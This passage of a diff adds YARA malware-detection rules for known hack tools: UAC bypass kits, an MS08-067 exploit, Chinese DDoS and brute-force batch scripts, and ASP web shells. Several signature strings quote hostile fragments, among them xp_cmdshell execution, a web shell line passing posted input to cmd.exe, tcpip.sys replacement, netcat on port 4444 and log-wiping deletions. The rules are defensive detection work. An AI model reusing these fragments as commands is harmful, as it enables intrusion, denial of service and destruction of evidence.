+		$s1 = "cmd.exe" fullword wide
+		$s2 = "ReactOS Development Team" fullword wide
+		$s3 = "ReactOS Command Processor" fullword wide
+		
+		$ext = "extension: .dll" nocase
+	condition:
+		all of ($s*) and $ext 
+}
+
+rule iKAT_tools_nmap {
+	meta:
+		description = "Generic rule for NMAP - based on NMAP 4 standalone"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+	strings:
+		$s0 = "Insecure.Org" fullword wide
+		$s1 = "Copyright (c) Insecure.Com" fullword wide
+		$s2 = "nmap" fullword nocase
+		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
+	condition:
+		all of them
+}
+
+rule iKAT_startbar {
+	meta:
+		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 50
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+	strings:
+		$s2 = "Shinysoft Limited1" fullword ascii
+		$s3 = "Shinysoft Limited0" fullword ascii
+		$s4 = "Wellington1" fullword ascii
+		$s6 = "Wainuiomata1" fullword ascii
+		$s8 = "56 Wright St1" fullword ascii
+		$s9 = "UTN-USERFirst-Object" fullword ascii
+		$s10 = "New Zealand1" fullword ascii
+	condition:
+		all of them
+}
+
+rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
+	meta:
+		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
+		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+		score = 20
+	strings:
+		$s0 = "Failed to get temp file for source AES decryption" fullword
+		$s5 = "Failed to get encryption header for pwd-protect" fullword
+		$s17 = "Failed to get filetime" fullword
+		$s20 = "Failed to delete temp file for password decoding (3)" fullword
+	condition:
+		all of them
+}
+
+rule iKAT_Tool_Generic {
+	meta:
+		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
+		author = "Florian Roth"
+		date = "05.11.14"
+		score = 55
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+	strings:
+		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+		$s1 = "Failed to read the entire file" fullword
+		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
+		$s9 = "Running Zip pipeline..." fullword
+		$s10 = "<FinTitle />" fullword
+		$s12 = "<AutoTemp>0</AutoTemp>" fullword
+		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+		$s15 = "AES Encrypting..." fullword
+		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+	condition:
+		all of them
+}
+
+rule BypassUac2 {
+	meta:
+		description = "Auto-generated rule - file BypassUac2.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+	strings:
+		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_3 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.dll"
+		author = "yarGen Yara Rule Generator"
+		hash = "1974aacd0ed987119999735cad8413031115ce35"
+	strings:
+		$s0 = "BypassUacDLL.dll" fullword wide
+		$s1 = "\\Release\\BypassUacDll" ascii
+		$s3 = "Win7ElevateDLL" fullword wide
+		$s7 = "BypassUacDLL" fullword wide
+	condition:
+		3 of them
+}
+
+rule BypassUac_9 {
+	meta:
+		description = "Auto-generated rule - file BypassUac.zip"
+		author = "yarGen Yara Rule Generator"
+		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
+	strings:
+		$s0 = "/x86/BypassUac.exe" fullword ascii
+		$s1 = "/x64/BypassUac.exe" fullword ascii
+		$s2 = "/x86/BypassUacDll.dll" fullword ascii
+		$s3 = "/x64/BypassUacDll.dll" fullword ascii
+		$s15 = "BypassUac" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_6 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUacDll_7 {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+	condition:
+		all of them
+}
+
+rule BypassUac_EXE {
+	meta:
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+	strings:
+		$s1 = "Wole32.dll" wide
+		$s3 = "System32\\migwiz" wide
+		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+		$s5 = "Elevation:Administrator!new:" wide
+		$s6 = "BypassUac" wide
+	condition:
+		all of them
+}
+
+rule APT_Proxy_Malware_Packed_dev
+{
+	meta:
+		author = "FRoth"
+		date = "2014-11-10"
+		description = "APT Malware - Proxy"
+		hash = "6b6a86ceeab64a6cb273debfa82aec58"
+		score = 50
+	strings:
+		$string0 = "PECompact2" fullword
+		$string1 = "[LordPE]"
+		$string2 = "steam_ker.dll"
+	condition:
+		all of them
+}
+
+rule Tzddos_DDoS_Tool_CN {
+	meta:
+		description = "Disclosed hacktool set - file tzddos"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+	condition:
+		all of them
+}
+
+rule Ncat_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file nc.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "001c0c01c96fa56216159f83f6f298755366e528"
+	strings:
+		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+		$s3 = "gethostpoop fuxored" fullword ascii
+		$s6 = "VERNOTSUPPORTED" fullword ascii
+		$s7 = "%s [%s] %d (%s)" fullword ascii
+		$s12 = " `--%s' doesn't allow an argument" fullword ascii
+	condition:
+		all of them
+}
+
+rule MS08_067_Exploit_Hacktools_CN {
+	meta:
+		description = "Disclosed hacktool set - file cs.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+	strings:
+		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+		$s3 = "Make SMB Connection error:%d" fullword ascii
+		$s5 = "Send Payload Over!" fullword ascii
+		$s7 = "Maybe Patched!" fullword ascii
+		$s8 = "RpcExceptionCode() = %u" fullword ascii
+		$s11 = "ph4nt0m" fullword wide
+		$s12 = "\\\\%s\\IPC$" fullword ascii
+	condition:
+		4 of them
+}
+
+rule Hacktools_CN_Burst_sql {
+	meta:
+		description = "Disclosed hacktool set - file sql.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+	strings:
+		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+		$s2 = "s.exe start error...%d" fullword ascii
+		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+		$s10 = "Result.txt" fullword ascii
+		$s11 = "Usage:sql.exe [options]" fullword ascii
+		$s17 = "%s root %s %d error" fullword ascii
+		$s18 = "Pass.txt" fullword ascii
+		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+	condition:
+		6 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos {
+	meta:
+		description = "Disclosed hacktool set - file spec.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "400a90c9eabeb94ae05e5036e21dc922b0c1ffad"
+	strings:
+		$s3 = "service@dywt.com.cn" fullword ascii
+		$s9 = "www.dywt.com.cn" fullword ascii
+		$s17 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+	condition:
+		2 of them
+}
+
+rule Hacktools_CN_Panda_445TOOL {
+	meta:
+		description = "Disclosed hacktool set - file 445TOOL.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "92050ba43029f914696289598cf3b18e34457a11"
+	strings:
+		$s0 = "scan.bat" fullword ascii
+		$s1 = "Http.exe" fullword ascii
+		$s2 = "GOGOGO.bat" fullword ascii
+		$s3 = "ip.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Panda_445 {
+	meta:
+		description = "Disclosed hacktool set - file 445.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+	strings:
+		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+		$s1 = "445\\nc.exe" fullword ascii
+		$s2 = "445\\s.exe" fullword ascii
+		$s3 = "cs.exe %1" fullword ascii
+		$s4 = "445\\cs.exe" fullword ascii
+		$s5 = "445\\ip.txt" fullword ascii
+		$s6 = "445\\cmd.bat" fullword ascii
+		$s9 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_WinEggDrop {
+	meta:
+		description = "Disclosed hacktool set - file s.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+	strings:
+		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+		$s8 = "Something Wrong About The Ports" fullword ascii
+		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Scan_BAT {
+	meta:
+		description = "Disclosed hacktool set - file scan.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_Burst {
+	meta:
+		description = "Disclosed hacktool set - file Burst.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_445_cmd {
+	meta:
+		description = "Disclosed hacktool set - file cmd.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+	strings:
+		$bat = "@echo off" fullword ascii
+		$s0 = "cs.exe %1" fullword ascii
+		$s2 = "nc %1 4444" fullword ascii
+	condition:
+		$bat at 0 and all of ($s*)
+}
+
+rule Hacktools_CN_GOGOGO_Bat {
+	meta:
+		description = "Disclosed hacktool set - file GOGOGO.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+	strings:
+		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+		$s6 = "del /f tcpip.sys" fullword ascii
+		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+		$s10 = "call scan.bat" fullword ascii
+		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+		$s18 = "sc config LmHosts start= auto" fullword ascii
+		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+	condition:
+		3 of them
+}
+
+rule Hacktools_CN_Burst_pass {
+	meta:
+		description = "Disclosed hacktool set - file pass.txt"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "55a05cf93dbd274355d798534be471dff26803f9"
+	strings:
+		$s0 = "123456.com" fullword ascii
+		$s1 = "123123.com" fullword ascii
+		$s2 = "360.com" fullword ascii
+		$s3 = "123.com" fullword ascii
+		$s4 = "juso.com" fullword ascii
+		$s5 = "sina.com" fullword ascii
+		$s7 = "changeme" fullword ascii
+		$s8 = "master" fullword ascii
+		$s9 = "google.com" fullword ascii
+		$s10 = "chinanet" fullword ascii
+		$s12 = "lionking" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_JoHor_Posts_Killer {
+	meta:
+		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+	strings:
+		$s0 = "Multithreading Posts_Send Killer" fullword ascii
+		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+		$s6 = "The program's need files was not exist!" fullword ascii
+		$s7 = "JoHor_Posts_Killer" fullword wide
+		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$s10 = "  ( /s ) :" fullword ascii
+		$s11 = "forms.vbp" fullword ascii
+		$s12 = "forms.vcp" fullword ascii
+		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_3_6_uplis {
+	meta:
+		description = "Disclosed hacktool set - file uplis.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a87d00d78838c2d968b72330ee6f21f69b2caae5"
+	strings:
+		$s0 = "http://dywt.com.cn" fullword ascii
+		$s1 = "service@dywt.com.cn" fullword ascii
+		$s4 = "GetNewInf" fullword ascii
+		$s5 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s8 = "yiyuyan" fullword ascii
+	condition:
+		4 of them
+}
+
+rule Hacktools_CN_Panda_tesksd {
+	meta:
+		description = "Disclosed hacktool set - file tesksd.jpg"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+	strings:
+		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+		$s1 = "ExeMiniDownload.exe" fullword wide
+		$s16 = "POST %Hs" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Panda_k {
+	meta:
+		description = "Disclosed hacktool set - file k.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "8d1170df533238ac2da7826bd8997917be1e1517"
+	strings:
+		$s0 = "(http://www.eyuyan.com)" fullword wide
+		$s1 = "trin" fullword wide
+		$s2 = "FAUL" fullword wide
+		$s10 = " program must be run " fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Http {
+	meta:
+		description = "Disclosed hacktool set - file Http.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+	strings:
+		$s0 = "RPCRT4.DLL" fullword ascii
+		$s1 = "WNetAddConnection2A" fullword ascii
+		$s2 = "NdrPointerBufferSize" fullword ascii
+		$s3 = "_controlfp" fullword ascii
+	condition:
+		all of them and filesize < 10KB
+}
+
+rule Hacktools_CN_JoHor_Rdos_get {
+	meta:
+		description = "Disclosed hacktool set - file get.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "09c32ca167136a17fd69df8c525ea5ffeca6c534"
+	strings:
+		$s1 = "http://dywt.com.cn" fullword ascii
+		$s2 = "service@dywt.com.cn" fullword ascii
+		$s3 = "Uncompress" fullword ascii
+		$s5 = "GetNewInf" fullword ascii
+		$s6 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s10 = "GetMD5" fullword ascii
+		$s12 = "RSACheck" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_LineExp {
+	meta:
+		description = "Disclosed hacktool set - file LineExp.vbp"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "1bd2db477c68cdcba9ae5c3668bd76c51fc12d2e"
+	strings:
+		$s0 = "http://dywt.com.cn" fullword ascii
+		$s1 = "service@dywt.com.cn" fullword ascii
+		$s2 = "EThread.fne" fullword ascii
+		$s3 = "GetNewInf" fullword ascii
+		$s4 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+		$s5 = "CloseThreadHandle" fullword ascii
+		$s6 = "WaitThread" fullword ascii
+		$s8 = "CreateCriticalSection" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Start {
+	meta:
+		description = "Disclosed hacktool set - file Start.bat - DoS tool"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+	strings:
+		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
+		$s1 = "Blast.bat /r 600" fullword ascii
+		$s2 = "Blast.bat /l Blast.bat" fullword ascii
+		$s3 = "Blast.bat /c 600" fullword ascii
+		$s4 = "start Clear.bat" fullword ascii
+		$s5 = "del Result.txt" fullword ascii
+		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
+		$s7 = "start Thecard.bat" fullword ascii
+		$s10 = "setlocal enabledelayedexpansion" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_tasksvr {
+	meta:
+		description = "Disclosed hacktool set - file tasksvr.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+	strings:
+		$s2 = "Consys21.dll" fullword ascii
+		$s4 = "360EntCall.exe" fullword wide
+		$s15 = "Beijing1" fullword ascii
+	condition:
+		all of them
+}
+rule Hacktools_CN_Burst_Clear {
+	meta:
+		description = "Disclosed hacktool set - file Clear.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+	strings:
+		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
+		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_andrew {
+	meta:
+		description = "Disclosed hacktool set - file andrew.exe - sethc.exe Debugger backdoor"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "abd03ebb08314297b83e6c795cc85bb85e1f4d71"
+	strings:
+		$s0 = "(http://www.eyuyan.com)" fullword wide
+		$s1 = "ClosePrinter" fullword ascii
+		$s18 = "version=\"1.0\" encoding" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Thecard {
+	meta:
+		description = "Disclosed hacktool set - file Thecard.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+	strings:
+		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+		$s1 = "Http://www.coffeewl.com" fullword ascii
+		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+		$s3 = "for /L %%a in (" fullword ascii
+		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Blast {
+	meta:
+		description = "Disclosed hacktool set - file Blast.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "b07702a381fa2eaee40b96ae2443918209674051"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+		$s1 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_VUBrute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+	strings:
+		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+		$s1 = "http://ubrute.com" fullword ascii
+		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
+		$s14 = "error.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule DK_Brute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+	strings:
+		$s6 = "get_CrackedCredentials" fullword ascii
+		$s13 = "Same port used for two different protocols:" fullword wide
+		$s18 = "coded by fLaSh" fullword ascii
+		$s19 = "get_grbToolsScaningCracking" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_config {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+	strings:
+		$s2 = "Restore=1" fullword ascii
+		$s6 = "Thread=" ascii
+		$s7 = "Running=1" fullword ascii
+		$s8 = "CheckCombination=" fullword ascii
+		$s10 = "AutoSave=1.000000" fullword ascii
+		$s12 = "TryConnect=" ascii
+		$s13 = "Tray=" ascii
+	condition:
+		all of them
+}
+
+rule sig_238_hunt {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+	strings:
+		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+		$s3 = "Usage - hunt \\\\servername" fullword ascii
+		$s4 = ".share = %S - %S" fullword wide
+		$s5 = "SMB share enumerator and admin finder " fullword ascii
+		$s7 = "Hunt only runs on Windows NT..." fullword ascii
+		$s8 = "User = %S" fullword ascii
+		$s9 = "Admin is %s\\%s" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_listip {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file listip.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+	strings:
+		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+		$s4 = "Local Host Name: %s" fullword ascii
+		$s5 = "Packed by exe32pack 1.38" fullword ascii
+		$s7 = "Local Computer Name: %s" fullword ascii
+		$s8 = "Local IP Adress: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTrayHookDll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+	strings:
+		$s0 = "ArtTrayHookDll.dll" fullword ascii
+		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_eee {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file eee.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+	strings:
+		$s0 = "szj1230@yesky.com" fullword wide
+		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+		$s4 = "MailTo:szj1230@yesky.com" fullword wide
+		$s5 = "Command1_Click" fullword ascii
+		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+		$s11 = "vb5chs.dll" fullword ascii
+		$s12 = "MSVBVM50.DLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_asp4 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+	strings:
+		$s0 = "system.dll" fullword ascii
+		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
+		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
+		$s5 = "atype=request(\"atype\") " fullword ascii
+		$s7 = "AceiveX dll" fullword ascii
+		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+		$s10 = "sys.reboot(atype)" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+	strings:
+		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+	condition:
+		3 of them
+}
+
+rule EditServer {
+	meta:
